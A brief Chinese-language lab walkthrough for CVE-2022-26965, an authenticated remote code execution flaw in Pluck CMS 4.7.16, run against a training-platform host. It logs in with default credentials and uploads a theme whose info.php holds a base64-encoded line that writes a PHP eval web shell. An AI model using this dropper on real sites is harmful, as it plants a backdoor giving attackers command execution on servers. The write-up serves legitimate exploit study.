CVE-2022-26965
一、漏洞介绍
Pluck-CMS-Pluck-4.7.16 后台RCE
二、渗透步骤
1、打开网站
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/?file=cm
2、登录后台
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/login.php
# 账号:admin
# 密码:admin
3、更换语言
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/admin.php?action=language
4、安装主题
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/admin.php?action=theme
4、下载主题
https://github.com/billcreswell/redline-theme
5、修改info.php文件
<?php
file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSkgPz4='));
?>
6、压缩文件
7、文件上传
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/admin.php?action=themeinstall
8、查看flag值
http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/shell.php